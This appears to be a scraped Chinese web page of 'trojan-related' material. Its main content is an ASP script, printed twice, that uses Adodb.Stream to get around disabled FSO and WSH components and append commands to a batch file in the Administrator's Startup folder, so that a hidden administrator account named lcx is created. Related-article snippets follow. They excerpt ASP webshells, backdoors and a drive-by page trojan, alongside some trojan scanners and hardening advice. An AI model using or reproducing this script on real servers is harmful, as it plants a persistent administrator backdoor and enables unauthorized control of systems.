<%
on error resume next
dim lcx
set lcx=server.CreateObject("Adodb.Stream")
lcx.Open
lcx.Type=2
lcx.CharSet="gb2312"
lcx.LoadFromFile "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\cook.bat"
lcx.Position=lcx.Size
lcx.writetext "net user lcx lcx /add"&chr(10)&"net localgroup administrators lcx /add"
lcx.SaveToFile "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\cook.bat",2
lcx.Close
set lcx=nothing
%> <%
on error resume next
dim lcx
set lcx=server.CreateObject("Adodb.Stream")
lcx.Open
lcx.Type=2
lcx.CharSet="gb2312"
lcx.LoadFromFile "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\cook.bat"
lcx.Position=lcx.Size
lcx.writetext "net user lcx lcx /add"&chr(10)&"net localgroup administrators lcx /add"
lcx.SaveToFile "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\cook.bat",2
lcx.Close
set lcx=nothing
%>
跨越fso、wsh、 application写文件_木马相关
时间: 2024-07-30 09:06:08
跨越fso、wsh、 application写文件_木马相关的相关文章
隐藏修改文件时间和文件属性的ASP脚本_木马相关
复制代码 代码如下: <% '隐藏并修改文件的最后修改时间的aspshell '原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等:FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件 ' 通过shell.application可以给文件重新设置一个最后修改时间 '2009/02/24 write by skyfire response.write "<form method=post>" response.write "
一款不错的asp木马 黑色界面_木马相关
<% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617" '密码 mName="BY:.尐飛" '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权 Server.ScriptTimeout=9
一个查ASP木马的小东东_木马相关
关于查ASP木马的程序,记得半年前在八进制发了一个测试版(具体的URL:http://forum.eviloctal.com/read-htm-tid-19665.html),得到很多朋友的指导,学到了很多东西,非常感谢他们.现在我发的这个升级版,修补了以前的bug,加入了对一些组件写文件函数的检测,更加趋于完美了,个人认为想绕过去有点难度哦. 这回的默认密码是security 当然啦,哈哈,lake2"比武招亲",欢迎各位朋友提出绕过检测的马马来,一经证实,lake2将把我自己写的某
几种另类的ASP后门_木马相关
<% 'code by netpatch dim dbfile,sql db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog") ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile set ydb=nothing if e
跨越fso、wsh、 application写文件
<% on error resume next dim lcx set lcx=server.CreateObject("Adodb.Stream") lcx.Open lcx.Type=2 lcx.CharSet="gb2312" lcx.LoadFromFile "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\cook.bat" lcx.Position=lcx.Size lc
网页木马代码例子(里面的文件是漏洞扫描器,呵呵)_木马相关
对于经常上网冲浪的朋友对于网页木马一定不会陌生,打开某个网站,莫名其妙的运行了某个木马,虽然在"Internet选项"里有"安全"设置,但是下面的代码就不会弹出任何信息就直接运行了程序,不信,follow me! (提示: 只是了解一下技术和方法,千万别搞破坏,yexj00.exe是一个windows2000 漏洞扫描器和查漏补缺用的,不是病毒或木马,放心运行.) 复制代码 代码如下: <script language="VBScript"
雷客图ASP站长安全助手的ASP木马查找功能_木马相关
可以在线查找空间里的asp木马 复制代码 代码如下: <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <% '设置密码 PASSWORD = "jb51net" dim Report if request.QueryString("act")="login" then if request.Form("pwd") = PASSWO
淘特ASP木马扫描器的代码_木马相关
+-----------------+ |淘特ASP木马扫描器| +-----------------+ 本程序可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序.系统采用扫描程序与病毒库分离的形式, 以后升级只需像杀毒软件那样升级病毒库就可以了.目前可以查杀所有流行的ASP木马程序. 系统提供了全站扫描.按文件夹和指定文件扫描三种扫描方式,如果网站文件比较少的话,推荐使用"全站扫描",如果文件比较多,推荐 使用按文件夹扫描.扫描过程,系统会记录
如何防范ASP木马_木马相关
修改三个组件来达到防asp木马攻击.FileSystemObject组件---对文件进行常规操作.WScript.Shell组件---可以调用系统内核运行DOS命令.Shell.Application组件--可以调用系统内核运行DOS命令. 一.使用FileSystemObject组件 1.可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字,如:改为FileSystemObject_